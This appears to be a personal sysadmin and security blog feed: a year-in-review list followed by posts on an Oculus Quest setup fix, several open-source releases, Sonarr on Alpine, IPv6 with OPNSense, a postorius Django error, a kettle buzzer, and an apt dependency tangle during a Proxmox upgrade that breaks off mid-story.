- On a computer:
  - A bit of Space Marines 2
  - Darktide, mostly with the 2 new classes.
  - Clair Obscur: Expedition 33, usually not a big fan of JRPG, but this game is nothing short of amazing.
  - Age of Wonders 4: great 4X game, which while not being my favourite genre at all, was a ton of fun.
  - Witchfire: hands down the FPS of the year for me. Great setting, great gameplay, visually astonishing, and a complete and utter lack of bullshit DLSS.
  - Mutant Year Zero: Road to Eden, a chill post-apocalyptic variant on XCOM, without the tedious base-building parts and with some neat stealth element.
  - Ready or Not: the spiritual successor to SWAT 4, but felt unfortunately a bit clunky and unfinished. Moreover, it unfortunately felt like another "kill the bad guys!" game, instead of playing a law-abiding officer.
- On a glorious steam deck:
  - Inscryption, gave up after the first act.
  - Balatro, great game, but too much luck involved for my taste.
  - The Precinct, I'm usually not a big fan of cops™, but playing GTA2 from the point of view of one, with proper penalties for not following due process is surprisingly nice.
Listened to some music.
Attended some concerts:
- The Svinkels!
- Alcest and BRUIT ≤, with the latter being a really good surprise.
- No One is innocent Fractal Universe Les tambours du bronx (opened with Sepultura's Bloody Roots, and closed with Rob Zombie's American Witch!), and Shaârghot, as the Boksons festival. Oh and we sung along while going back to the car on Early Maggots playing some classic Spliknot tracks in the distance.
Contributed to a couple of projects:
- metasploit and metasploit-payloads.
- miniflux, with around 200 (!) pull-request merged this year alone.
- harper, a trivial low-hanging things to make debugging easier, and opened a bunch of bugs.
- Alpine Linux, by being a package maintainer, sending a handful of merge-requests, and trying to get rid of python-six.
- Nos oignons, as part of the administration council and the sysadmin team. We're now responsible for a little bit more than 3% of the network's total capacity.
- OpenMW, by maintaining the infrastructure. MediaWiki, that we're using for our wiki, is not only annoying to keep up to date, but also to fight spam: doing SQL by hand isn't really state of the art abuse remediation, sigh. Let's hope that the combination of hCaptcha, DNSBL from spamhaus.org/spamrats.com/0spam.org/z.mailspike.net, keyword-based blocklist, and clownflare will curb the tide. And because morons can't stop externalizing their costs directly into our faces, I deployed Anubis on the forum and the wiki, sigh.
Kept on writing my book, reaching a bit more than 100.000 words.
Went to the Grehack, where I saw old friends and made new ones.
Added possible subtitles to this blog, bringing their total number above 1500.
Changed the TLS certificates for this website to use elliptic curves for the whole chain: enjoy marginally faster handshakes and equally marginally size reduction in certificates transmission!
Bought a house in the East of France, feel free to come say hi. As a side-effect I learnt how to do some basic plumbing/electricity/wood-working/gardening/…
Got a fully-remote job at Casaba Security. The first weeks were a bit odd for everyone, as the switch from from a megacorp to a small(er) structure was a bit rough, but in the end I'm quite happy working there.
Spent a couple of months without internet at home, hence why this little corner of the internet was unreachable. Things are now back to normal, and I have fiber in my office. A big thank you to everyone who reached out to enquire if everything was alright <3.
As part of a conscious effort to make the word a better and more welcoming place, I successfully changed my usage of expletives and insults to more inclusive ones. I also think that this provides a positive influence on my friends and family, leading by example. Newly used terms include "sac à merde" ("shitbag"), "va te faire cuire le cul" ("go get your ass cooked"), "va marcher sur des legos" ("go walk on legos"), "bête à bouffer du grillage" and "bête à bêcher de la flotte" ("wire-mesh-eater/water digging level of stupid"), … Do let me know if you have suggestions, I'd love to expand my range of possibility and nuances.

Fixing the health and safety video loop during the Oculus Quest setup

2025-12-23T14:45:00+01:00

I gifted an Oculus Quest (that I got as a gift a couple of years ago) to my brother, but because we're in 2025 and everything computer-related sucks, one has to associate an online account with the device to make use of it. Imagine having to do this to use a regular screen… Nevertheless, if you're trying to factory-reset it and re-setup it, you'll end up having the (mandatory) "health and safety video" stuck in a loop and you won't be able to finish the process. This is because ~~Facebook~~ Meta is a small underfunded independent software company, and thus it sadly can't afford to make sure that a $500 product sold 5 years ago can still be setup today. If you're foolish enough to call the support, you'll likely be politely told to fuck off, so don't bother.

But I remember that when I played with it, the setup phase was trivial: odds are that an upgrade of the (mandatory for setup) android app broke compatibility with the device. Using an old version will likely work. Unfortunately, as Google's Play Store doesn't allow one to install older versions, for SeCuRiTy ReAsOnS. So instead of being able to download what we're looking for from a trusted source, we'll have to use something like uptodown to download the APK we're looking for, sigh. I picked the Oculus Quest 276.0.0.15.109, and it worked for me. Don't forget to click the "all variants" button on uptodown to pick the right architecture (arm64-v8a or armeabi-v7a). If you don't know which is the right one, don't worry: if you pick the wrong one, your phone will tell you that it can't install it, and you'll simply have to install the other one. Oh and also click ignore when it prompts you to upgrade to a newer version when you're using the app. Try to setup the Oculus quest again, and you should no longer be blocked on the annoying video.

Once the headset is setup, the application can be updated to its latest version in the Google Play Store, but you can remove it from your phone all the same since it's not needed once the setup is complete. Odds are that having anything Meta-related installed on your phone will give you cyber-cancer, steal your nudes and sell every pieces of information it can collect to the everyone willing to buy them, but you do you.

If you're worried about installing random APK files from the interweb (as you should), the file has been uploaded to VirusTotal, and is signed by the certificate 331660b6dd3bd582f3dfd3cbae4546724668a021, which is a correct Facebook one.

Oh, and since it's Christmas time, I'd recommend gifting Half-Life: Alyx to go with the device, it's a great game.

fortify-headers 3.0

2025-12-08T17:00:00+01:00

In late 2022, I started to contribute to fortify-headers, and the original author, sin, was kind enough to entrust the project to me.

Unfortunately, I feel that I haven't lived up to the expectations, both from others, but also mine. I enthusiastically piled more code on top of it, instead of moving slowly and making sure that I wasn't breaking anything. Sure, I added a test suite, but it can't cover every edge-cases, especially when dealing with code used system-wide in virtually all C packages/software. It also didn't help that I had a "complicated" life those last couple of years.

Now onto the good news: I now have some peace of mind and free time again, meaning I can go back to try to properly maintain fortify-headers. I shelved everything I added to it on an experimental branch (so that nothing is lost, including old releases that I did), and started clean on top a sin's latest master again. I'm not happy about rewriting history, I think it was least worse option in my opinion, versus having a big "revert" commit, or an interminable daisy-chain of revert.

So what's new in this release 3.0 compared to sin's version? A handful of things:

A complete testsuite, running on github actions, with -Wall -Wextra
Clang support, thanks to q66
access and format annotations
A missing include in select.h was added
wctomb was removed, as it was buggy
Support for swab was added
a 64b fix for time

Attribution was of course kept, and everything is available on https://git.2f30.org/fortify-headers/log.html and https://github.com/jvoisin/fortify-headers (to use github CI). QA-wise, on top of the testsuite, a full OpenWRT build is used as a smoke test. This should prevent bugs from creeping in.

I'd love if people of you could take a quick look at this new tentative, so that I can ask downstream projects to give a new try at upgrading from 1.1.

Running the packaged *arr stack on Alpine

2025-12-04T00:15:00+01:00

I've been running some parts of the *arr stack on my hypervisor at home for quite some time now, but only recently did I notice that they were packaged in Alpine! I trashed the container with all the carefully-deployed-by-hand binaries, created a new one running Alpine Edge, ran apk add sonarr radarr prowlarr, and…

~ # apk add sonarr radarr prowlarr
ERROR: unable to select packages:
  aspnetcore6-runtime (no such package):
    required by: sonarr-4.0.16.2944-r0[aspnetcore6-runtime]
~ #

Urgh, the latest Sonarr release (v4.0.16.2944), is still running on .NET 6, which isn't packaged anymore on Alpine Edge. Fortunately, one can do horribly unsupported things like mixing repositories, and have a /etc/apk/repositories frankenfile looking like this:

https://dl-cdn.alpinelinux.org/alpine/edge/main
https://dl-cdn.alpinelinux.org/alpine/edge/community
https://dl-cdn.alpinelinux.org/alpine/edge/testing

@main319 https://dl-cdn.alpinelinux.org/alpine/v3.19/main
@community319 https://dl-cdn.alpinelinux.org/alpine/v3.19/community

Installing Sonarr can then be done with apk add sonar@community319 sonar-openrc@community319, launched via service sonarr start, and … it crashes after a couple of seconds. Running service -d sonarr start tells us that the binary being launched is /usr/lib/sonarr/bin/Sonarr, so let's see what happens when we run it manually:

~ $ /usr/lib/sonarr/bin/Sonarr
You must install or update .NET to run this application.

App: /usr/lib/sonarr/bin/Sonarr
Architecture: x64
Framework: 'Microsoft.NETCore.App', version '6.0.36' (x64)
.NET location: /usr/lib/dotnet

The following frameworks were found:
  6.0.31 at [/usr/lib/dotnet/shared/Microsoft.NETCore.App]
  8.0.22 at [/usr/lib/dotnet/shared/Microsoft.NETCore.App]

Learn more:
https://aka.ms/dotnet/app-launch-failed

To install missing framework, download:
https://aka.ms/dotnet-core-applaunch?framework=Microsoft.NETCore.App&framework_version=6.0.36&arch=x64&rid=alpine.3.23-x64&os=alpine
~ $

Alright, .NET version mismatch: we have 6.0.31 installed and the binary wants 6.0.36. The DOTNET_ROLL_FORWARD environment variable can be used to make a binary run on newer version of the runtime, but not an older one. While we can't use 6.0.31, we have 8.0.22 installed for the rest of the *arr stack, so let's give it a try. Adding DOTNET_ROLL_FORWARD=LatestMajor followed by export DOTNET_ROLL_FORWARD in /etc/init.d/sonarr does the trick, and Sonarr is now working, huzzah!

Once Sonarr 5.X is released, I'll simply remove the @community319/@main@319 lines from /etc/apk/repositories and run apk update; apk upgrade to get the version compiled for modern packaged .NET.

IPv6 with a Freebox Pop and OPNSense

2025-11-30T15:00:00+01:00

Because the Freebox Pop is ~~an underpowered piece of crap~~ quite weak when it comes to NAT'ing anything above 100Mbps, I decided to get a proper machine and slap OPNSense on it: I'm paying for the whole fiber, I'm going to use the whole fiber.

IPv4 was trivial: Firewall -> NAT -> Port Forward, and you're done. It took me 5 minutes. IPv6 very much not so, partly because I don't have a clue about IPv6 (and let's be honest, network in general), partly because it's an almost 30 years old pile of designed-by-committee RFC.

Amyway, the Freebox Pop is giving me seven /64 prefixes that I can freely delegate, so for simplicity's sake and because I'm a lazy punk, I:

~~waste~~ use one for the network between the Freebox and the WAN interface of OPNSense.
use a second one for the LAN

It looks like this:

+──────────+
│ Internet │
+──────────+
     │
     ▼
┌─────────┐
│ Freebox │
└─────────┘
     │      prefix A
     ▼
┌──────────┐
│ OPNSense │
└──────────┘
     │      prefix B
     ▼
  +─────+
  │ LAN │
  +─────+

Apparently, it's possible to not waste a prefix for the network between the Freebox and the router, but in the spirit of modern times, I'm comfortable wasting a significant amount of resources because I couldn't be bothered.

Freebox side

Open http://mafreebox.freebox.fr in your browser
Paramètres de la Freebox -> Réseau Local: Mode Réseau -> Bridge
Open http://mafreebox.freebox.fr in your browser
Paramètres de la Freebox -> Connexion Internet: Configuration IPv6
1. Note the Local link address
2. Note the first and second delegate prefixes, eg. 2a01:xxx:xxx:xxx1:: and 2a01:xxx:xxx:xxx2::.
3. Disable the IPv6 firewall, since it's dropping ~everything and can't be configured besides on/off.

OPNSense side

Open the admin interface
Firewall -> Settings -> Advanced -> Allow IPv6
Interfaces -> Overview -> WAN should contain an IPv6 starting with fe80:: note it down. It's the Local link address of the WAN interface.
System -> Gateway -> Add:
1. Name: FreeboxIPv6Gateway
2. IP Address: IPv6 address of the Freebox in the first delegate prefix, 2a01:xxx:xxx:xxx1::1 in our case
3. Upstream gateway: tick the box
4. Monitor IP: tick the box, if only to be warned/have logs if when things go South

Back to the Freebox side

Open http://mafreebox.freebox.fr/ in your browser
Paramètres de la Freebox -> Connexion Internet: Configuration IPv6 -> Délégation de prefixe: add the Local link address of the WAN interface into the Next Hop field for the first and second prefixes.

Back to the OPNSense side

Interfaces -> WAN:
1. Generic configuration -> IPv6 Configuration Type, set it to Static IPv6
2. Static IPv6 configuration -> IPv6 address, set it to any IPv6 address present in the first delegated prefix but the one ending in :1 since it's already used by the Freebox. I put 2a01:xxx:xxx:xxx1::2.
3. IPv6 Upstream Gateway: put the gateway we created, FreeboxIPv6Gateway.
Interfaces -> LAN:
1. Generic configuration -> IPv6 Configuration Type, set it to Static IPv6
2. Static IPv6 configuration -> IPv6 address, set it to any IPv6 address present in the second delegated prefix but the one ending in :1 since it's already used by the Freebox. I put 2a01:xxx:xxx:xxx2::2.

And now comes the salt: in IPv4, one would normally use DHCP to assign IP addresses. In IPv6, one can use DHCPv6 or SLAAC+RDNSS!

Anyway, I'm going with SLAAC only and hoping for the best.

Services -> Router advertisements -> WAN
1. Router Advertisements -> Router Only, since I use a fixed IPv6 for the WAN interface of the router, and don't provide network access to anything else on this segment.
2. Advertise Default Gateway, tick the box.
Services -> Router advertisements -> LAN
1. Router Advertisements -> Stateless, and pray
2. Advertise Default Gateway, tick the box.
3. Adversitse Routes, put the second prefix.

Another (mild) wave of saltiness: you need to punch holes into your firewall to allow incoming traffic for ICMPv6, otherwise things might just break. Fear not, there is a whole RFC about what should normally not be dropped, what will be dropped anyway, what a policy should be defined for, and what should be dropped unless a good case can be made, both for Transit Traffic and Local Configuration Traffic. At this point I just wanted things to work, so I courageously just gave up and trusted OPNSense "Automatically generated rules" to take care of this for me.

Oh, and if you have things like Jellyfin, set the firewall to "conservative", otherwise it'll randomly drop your websocket connections, and you'll waste a whole afternoon debugging it.

mat2 0.14.0

2025-10-23T15:30:00+02:00

There is a new version of mat2: 0.14.0, with a new feature and a deprecation, to balance things out:

Add webp support
Improve reliability
Correctly handle PDF with weird filenames
Improve epub support
Improve MSOffice documents support
Add Python 3.13 and 3.14 support
Remove bubblewrap sandboxing

Bubblewrap sandboxing was removed as it was a significant source of issues over the years, was annoying to test in the continuous integration suite, didn't provide significant security improvement besides mitigating possible command injections in exiftool, and was best-effort anyway in the threat model.

Another important change is that the main repository for mat2 moved from 0xacab to github, for multiple reasons. First, because the web is a terrible place, 0xacab has to deal with abuses in various shapes and forms, and the easiest way to mitigate it is to make it non-trivial to register an account on the platform. Unfortunately, this makes it harder for people to report issues, or to contribute to mat2. Second, running computers is expensive, and I'd rather burn Microsoft's money than riseup's one. Third, Gitlab is becoming bloated and confusing, especially for such a small project as mat2. I'm not particularly happy about the move, as I'd rather use/depend on non-profit owned/operated infrastructure than an evil megacorp one, but it was a pragmatic decision. Worse case, I moved it once, I can always move it somewhere else in the future if needed.

As usual, if you know some python help is welcome.

Fixing "'humanize' is not a registered tag library" on postorious

2025-10-23T14:00:00+02:00

At Nos oignons, we're running Tor exit nodes, but also a handful of services, like our website, some git repositories, some lightweight monitoring, … but also internal and external mailing lists. For the latter, we're using mailman3/hyperkitty with schleuder on top of it, making it an unholy pile of python, ruby, gpg and email shenanigans that the sysadmin team has to prevent from falling over.

Unfortunately, teaching sand to think was a mistake, and anything running on a computer will invariably fail at some point, mailing lists are no exceptions. Today I got the following email on the schleuder-admins@ list:

Net::ReadTimeout with #<TCPSocket:(closed)>
/usr/lib/ruby/3.3.0/net/protocol.rb:229:in `rbuf_fill'
/usr/lib/ruby/3.3.0/net/protocol.rb:199:in `readuntil'
/usr/lib/ruby/3.3.0/net/protocol.rb:209:in `readline'
/usr/lib/ruby/gems/3.3.0/gems/net-smtp-0.5.1/lib/net/smtp.rb:1017:in `recv_response'
/usr/lib/ruby/gems/3.3.0/gems/net-smtp-0.5.1/lib/net/smtp.rb:979:in `block in data'
/usr/lib/ruby/gems/3.3.0/gems/net-smtp-0.5.1/lib/net/smtp.rb:1027:in `critical'
/usr/lib/ruby/gems/3.3.0/gems/net-smtp-0.5.1/lib/net/smtp.rb:965:in `data'
/usr/lib/ruby/gems/3.3.0/gems/net-smtp-0.5.1/lib/net/smtp.rb:799:in `block in send_message'
/usr/lib/ruby/gems/3.3.0/gems/net-smtp-0.5.1/lib/net/smtp.rb:926:in `rcptto_list'
/usr/lib/ruby/gems/3.3.0/gems/net-smtp-0.5.1/lib/net/smtp.rb:799:in `send_message'
/usr/lib/ruby/vendor_ruby/mail/network/delivery_methods/smtp_connection.rb:53:in `deliver!'
/usr/lib/ruby/vendor_ruby/mail/network/delivery_methods/smtp.rb:101:in `block in deliver!'
/usr/lib/ruby/gems/3.3.0/gems/net-smtp-0.5.1/lib/net/smtp.rb:643:in `start'
/usr/lib/ruby/vendor_ruby/mail/network/delivery_methods/smtp.rb:109:in `start_smtp_session'
/usr/lib/ruby/vendor_ruby/mail/network/delivery_methods/smtp.rb:100:in `deliver!'
/usr/lib/ruby/vendor_ruby/mail/message.rb:2145:in `do_delivery'
/usr/lib/ruby/vendor_ruby/mail/message.rb:255:in `deliver'
/usr/lib/ruby/vendor_ruby/schleuder/mail/gpg/delivery_handler.rb:27:in `deliver_mail'
/usr/lib/ruby/vendor_ruby/mail/message.rb:253:in `deliver'
/usr/lib/ruby/vendor_ruby/schleuder/logger_notifications.rb:48:in `block in notify_admin'
/usr/lib/ruby/vendor_ruby/schleuder/logger_notifications.rb:29:in `each'
/usr/lib/ruby/vendor_ruby/schleuder/logger_notifications.rb:29:in `notify_admin'
/usr/lib/ruby/vendor_ruby/schleuder/logger_notifications.rb:13:in `error'
/usr/lib/ruby/vendor_ruby/schleuder/list.rb:379:in `rescue in block in send_to_subscriptions'
/usr/lib/ruby/vendor_ruby/schleuder/list.rb:362:in `block in send_to_subscriptions'
/usr/share/rubygems-integration/all/gems/activerecord-7.2.2.1/lib/active_record/relation/delegation.rb:98:in `each'
/usr/share/rubygems-integration/all/gems/activerecord-7.2.2.1/lib/active_record/relation/delegation.rb:98:in `each'
/usr/lib/ruby/vendor_ruby/schleuder/list.rb:361:in `send_to_subscriptions'
/usr/lib/ruby/vendor_ruby/schleuder/runner.rb:90:in `run'
/usr/lib/ruby/vendor_ruby/schleuder/cli.rb:38:in `work'
/usr/share/rubygems-integration/all/gems/thor-1.3.2/lib/thor/command.rb:28:in `run'
/usr/share/rubygems-integration/all/gems/thor-1.3.2/lib/thor/invocation.rb:127:in `invoke_command'
/usr/share/rubygems-integration/all/gems/thor-1.3.2/lib/thor.rb:538:in `dispatch'
/usr/share/rubygems-integration/all/gems/thor-1.3.2/lib/thor/base.rb:584:in `start'
/usr/bin/schleuder:13:in `<main>'


[Django] ERROR (EXTERNAL IP): Internal Server Error:.eml
Subject: [Django] ERROR (EXTERNAL IP): Internal Server Error: /postorius/lists/<REDACTED>@nos-oignons.net/held_messages
From: <REDACTED>@lists.nos-oignons.net
Date: Thu, 23 Oct 2025 05:06:17 -0000
To: root@localhost, <REDACTED>@nos-oignons.net

Internal Server Error: /postorius/lists/<REDACTED>@nos-oignons.net/held_messages

TemplateSyntaxError at /postorius/lists/<REDACTED>@nos-oignons.net/held_messages
'humanize' is not a registered tag library. Must be one of:
account
admin_list
admin_modify
admin_urls
allauth
bootstrap_tags
cache
compress
d_gravatar
date_helpers
debugger_tags
decorate
gravatar
highlight
highlighting
hk_generic
hk_haystack
i18n
indent_text
l10n
log
markdown
membership_helpers
more_like_this
nav_helpers
p_gravatar
pagination
postorius_helpers
rest_framework
socialaccount
static
syntax_color
tz
widont

Request Method: GET
Request URL: https://lists.nos-oignons.net/postorius/lists/<REDACTED>@nos-oignons.net/held_messages
Django Version: 4.2.23
Python Executable: /usr/bin/uwsgi-core
Python Version: 3.13.5
Python Path: ['.', '', '/usr/lib/python313.zip', '/usr/lib/python3.13', '/usr/lib/python3.13/lib-dynload', '/usr/local/lib/python3.13/dist-packages', '/usr/lib/python3/dist-packages']
Server time: Thu, 23 Oct 2025 05:06:17 +0000
Installed Applications:
('hyperkitty',
 'postorius',
 'django_mailman3',
 'django.contrib.admin',
 'django.contrib.auth',
 'django.contrib.contenttypes',
 'django.contrib.sessions',
 'django.contrib.sites',
 'django.contrib.messages',
 'django.contrib.staticfiles',
 'rest_framework',
 'django_gravatar',
 'compressor',
 'haystack',
 'django_extensions',
 'django_q',
 'allauth',
 'allauth.account',
 'allauth.socialaccount')
Installed Middleware:
('allauth.account.middleware.AccountMiddleware',
 'django.contrib.sessions.middleware.SessionMiddleware',
 'django.middleware.common.CommonMiddleware',
 'django.middleware.csrf.CsrfViewMiddleware',
 'django.middleware.locale.LocaleMiddleware',
 'django.contrib.auth.middleware.AuthenticationMiddleware',
 'django.contrib.messages.middleware.MessageMiddleware',
 'django.middleware.clickjacking.XFrameOptionsMiddleware',
 'django.middleware.security.SecurityMiddleware',
 'django_mailman3.middleware.TimezoneMiddleware',
 'postorius.middleware.PostoriusMiddleware')


Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/django/template/defaulttags.py", line 1026, in find_library
    return parser.libraries[name]
           ^^^^^^^^^^^^^^^^^^^^^^

During handling of the above exception ('humanize'), another exception occurred:
  File "/usr/lib/python3/dist-packages/django/core/handlers/exception.py", line 55, in inner
    response = get_response(request)
               ^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/django/core/handlers/base.py", line 197, in _get_response
    response = wrapped_callback(request, *callback_args, **callback_kwargs)
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/django/contrib/auth/decorators.py", line 23, in _wrapper_view
    return view_func(request, *args, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/postorius/auth/decorators.py", line 66, in wrapper
    return fn(*args, **kwargs)
           ^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/postorius/views/list.py", line 889, in list_moderation
    return render(request, 'postorius/lists/held_messages.html', context)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/django/shortcuts.py", line 24, in render
    content = loader.render_to_string(template_name, context, request, using=using)
              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/django/template/loader.py", line 61, in render_to_string
    template = get_template(template_name, using=using)
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/django/template/loader.py", line 15, in get_template
    return engine.get_template(template_name)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/django/template/backends/django.py", line 33, in get_template
    return Template(self.engine.get_template(template_name), self)
                    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/django/template/engine.py", line 175, in get_template
    template, origin = self.find_template(template_name)
                       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/django/template/engine.py", line 157, in find_template
    template = loader.get_template(name, skip=skip)
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/django/template/loaders/cached.py", line 57, in get_template
    template = super().get_template(template_name, skip)
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/django/template/loaders/base.py", line 28, in get_template
    return Template(

  File "/usr/lib/python3/dist-packages/django/template/base.py", line 154, in __init__
    self.nodelist = self.compile_nodelist()
                    ^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/django/template/base.py", line 200, in compile_nodelist
    return parser.parse()
           ^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/django/template/base.py", line 513, in parse
    raise self.error(token, e)
    ^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/django/template/base.py", line 511, in parse
    compiled_result = compile_func(self, token)
                      ^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/django/template/loader_tags.py", line 293, in do_extends
    nodelist = parser.parse()
               ^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/django/template/base.py", line 513, in parse
    raise self.error(token, e)
    ^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/django/template/base.py", line 511, in parse
    compiled_result = compile_func(self, token)
                      ^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/django/template/defaulttags.py", line 1088, in load
    lib = find_library(parser, name)
          ^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/django/template/defaulttags.py", line 1028, in find_library
    raise TemplateSyntaxError(
    ^

Exception Type: TemplateSyntaxError at /postorius/lists/ag@nos-oignons.net/held_messages
Exception Value: 'humanize' is not a registered tag library. Must be one of:
account
admin_list
admin_modify
admin_urls
allauth
bootstrap_tags
cache
compress
d_gravatar
date_helpers
debugger_tags
decorate
gravatar
highlight
highlighting
hk_generic
hk_haystack
i18n
indent_text
l10n
log
markdown
membership_helpers
more_like_this
nav_helpers
p_gravatar
pagination
postorius_helpers
rest_framework
socialaccount
static
syntax_color
tz
widont
Raised during: postorius.views.list.list_moderation

Since this is a django stacktrace complaining about a missing application, so it should simply be a matter of adding to /usr/share/mailman3-web/settings.py. Unfortunately:

root@bulbe:~# grep humanize /usr/share/mailman3-web/settings.py
    'django.contrib.humanize',
root@bulbe:~#

After a fair amount of cursing, spelunking in mailman-users and various strace+grep monstrosities, the solution was found: Instead of adding 'django.contrib.humanize' to the INSTALLED_APPS tuple in /usr/share/mailman3-web/settings.py as one would expect, it should be added in /etc/mailman3/mailman-web.py instead.

In the hope that this blogpost will help you waste less time on this than I did.

Silencing a Kitchencook teatime kettle

2025-10-13T18:00:00+02:00

My household recently acquired a Kitchencook TEATIME kettle. It's quite fancy, with a handful of features that I don't really use nor care about, but I'm quite content with its 1.7L capacity.

Unfortunately, it beeps a lot. Here is a non-exhaustive list of things resulting in a dreadful unwanted noise: removing/putting the kettle from/on the base, when the water is at the right temperature, when one turns it off/on, when one presses a button, … sometimes even in the middle of the night for no apparent reason. This is fucking unacceptable behaviour, so here is how to fix it. Start by doing yourself a service and get yourself a screwdrivers kit from iFixit, as Kitchencook apparently hates their customers and decided to use Tri-angle screws for the base:

Once open, remove the 3 phillips screws fixing the PCB to the base:

The buzzer is the small cylindrical device on the bottom-left of the PCB:

It's a small piezo from ZFLY (Zhongshan Zhongli Electronics). The way piezoelectric speaker are working is by having a small piece of piezoelectric material fixed to a metallic diaphragm, and to excite it via a small alternative voltage, so that the disc will shrink/expand, causing the diaphragm to vibrate, and thus create sound. Silencing the infernal machine is simply a matter of removing the diaphragm altogether:

I'd recommend taping it to the plastic somewhere on the inside of the base, so that you can always put if back should you part with the device, and hand it over to some unhinged noise-lover maniac.

You should now be able to enjoy your tea in a blissful silence.

Snuffleupagus 0.12.0 - Stegodontidae

2025-08-19T22:15:00+02:00

I just published a new release of Snuffleupagus, the hardening module for php7+ and php8+, version 0.12.0, codename "Stegodontidae", named after the extinct family of proboscideans, a cousin of the elephants we know (and love.) There aren't any new flashing features, only bug fixes and minor improvements, along with the usual support of newer PHP versions.

Changelog

Unify the default rules across all php versions
Snuffleupagus will no longer report outdated PHP versions
Fix a possible cookie-related crash
Fix a NULL-pointer dereference
Fix a minor portability issue
Improve modern Debian support
Improved documentation

As usual, if you want to help, we have some low hanging fruits ♥

See you in your PHP stack!

Manually fixing apt's "Unmet dependencies" error

2025-08-05T22:00:00+02:00

I am, despite my best judgment and common sense, acting as a system administrator for a handful of projects/users, sometimes on my own, sometimes as part of a team. On the bright side, it's usually a great source of weird debugging/workaround stories, like this one.

With the new release of proxmox and with 30 minutes of free time, a sysadmin team I'm part of thought it would be nice to upgrade a box together. An admin ran pve8to9 --full, changed the repositories from bookworm to trixie, and ran apt dist-upgrade, and… their screen was filled with WARNING: ld.so: invalid GLIBC_TUNABLES `glibc.malloc.perturb=1,glibc.malloc.check=1,glibc.malloc.tcache_count=0': ignored.. Panic. So they hit <C-c> to investigate what was happening. Turns out, another admin threw those configuration options somewhere to "harden" the glibc allocator, and they're now deprecated, hence the message. No big deal, this can be fixed by removing those options, and running apt dist-upgrade again. Or can it?

# apt dist-upgrade 
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
You might want to run 'apt --fix-broken install' to correct these.
The following packages have unmet dependencies:
 libanyevent-perl : Depends: perlapi-5.40.0
                    Recommends: libasync-interrupt-perl but it is not installed
                    Recommends: libev-perl but it is not installed or
                                libevent-perl but it is not installed
                    Recommends: libguard-perl but it is not installed
 libcommon-sense-perl : Depends: perl (< 5.36.1~) but 5.40.1-6 is installed
 libnss-systemd : Depends: systemd (= 257.7-1) but 252.38-1~deb12u1 is installed
 libpam-systemd : Depends: systemd (= 257.7-1) but 252.38-1~deb12u1 is installed
 libsasl2-2 : Depends: libssl3t64 (>= 3.0.0) but it is not installed
              Recommends: libsasl2-modules (>= 2.1.28+dfsg1-9) but it is not installed
 libsasl2-modules-db : Depends: libdb5.3t64 but it is not installed
 libsystemd-shared : Depends: libssl3t64 (>= 3.4.0) but it is not installed
 openssl : Depends: libssl3t64 (>= 3.5.0) but it is not installed
 perl : Depends: perl-base (= 5.40.1-6) but 5.36.0-7+deb12u2 is installed
        Depends: libperl5.40 (= 5.40.1-6) but it is not installed
 perl-modules-5.40 : Depends: perl-base (>= 5.40.1-1) but 5.36.0-7+deb12u2 is installed
 systemd : Depends: libsystemd-shared (= 252.38-1~deb12u1) but 257.7-1 is installed
           Depends: libsystemd0 (= 252.38-1~deb12u1) but 257.7-1 is installed
E: Unmet dependencies. Try 'apt --fix-broken install' with no packages (or specify a solution).
[100]
#

Alright, let's try apt --fix-broken install:

# apt --fix-broken install
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
Correcting dependencies... Done
The following packages were automatically installed and are no longer required:

[…]

75 upgraded, 64 newly installed, 50 to remove and 530 not upgraded.
17 not fully installed or removed.
Need to get 0 B/118 MB of archives.
After this operation, 215 MB of additional disk space will be used.
Do you want to continue? [Y/n] y
W: (pve-apt-hook) !! WARNING !!
W: (pve-apt-hook) You are attempting to remove the meta-package 'proxmox-ve'!
W: (pve-apt-hook) 
W: (pve-apt-hook) If you really want to permanently remove 'proxmox-ve' from your system, run the following command
W: (pve-apt-hook)   touch '/please-remove-proxmox-ve'
W: (pve-apt-hook) run apt purge proxmox-ve to remove the meta-package
W: (pve-apt-hook) and repeat your apt invocation.
W: (pve-apt-hook) 
W: (pve-apt-hook) If you are unsure why 'proxmox-ve' would be removed, please verify
W: (pve-apt-hook)   - your APT repository settings
W: (pve-apt-hook)   - that you are using 'apt full-upgrade' to upgrade your system
E: Sub-process /usr/share/proxmox-ve/pve-apt-hook returned an error code (1)
E: Failure running script /usr/share/proxmox-ve/pve-apt-hook
[100]
#

